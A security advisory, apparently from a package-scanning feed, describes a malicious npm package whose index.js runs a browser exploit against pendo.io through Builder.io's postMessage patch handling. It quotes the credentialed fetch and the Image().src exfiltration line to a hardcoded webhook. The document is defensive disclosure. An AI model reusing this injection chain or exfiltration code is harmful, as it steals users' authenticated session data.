npm-builderio-qwik-poc @1.0.5

Summary

The package's main entry index.js is a working browser exploit, not a library. When loaded in a DOM context, it creates a hidden iframe pointing at www.pendo.io?builder.frameEditing=true , then sprays builder.patchUpdates postMessages whose op:'replace' payload on /bindings/show carries a JavaScript string that the Builder.io SDK's stringToFunction() passes to Function() — achieving script execution in the pendo.io origin. The injected script performs a credentialed fetch('https://novus-api.pendo.io/pendo/app', {credentials:'include'}) , base64-encodes the response, chunks it, and exfiltrates each chunk via new Image().src = 'https://webhook.site/236d0505-1750-49fe-907d-604b0934b5c7?chunk=...&d=...' to a hardcoded attacker-controlled webhook. Any developer who bundles this package into a web application weaponizes their site against pendo.io users: visitors will silently leak authenticated pendo.io session data to the attacker. The exfil destination is hardcoded with no opt-in, configuration, or authorization gate, so the harm fires on every load regardless of consumer intent. There is no install-time or import-time Node side effect (the code requires a browser DOM), but the public API surface itself is the attack.

Source: amazon-inspector (11a743cdce28dd141d636ff13baaee44df53fbaaed17efdc5a7380281b7097e1)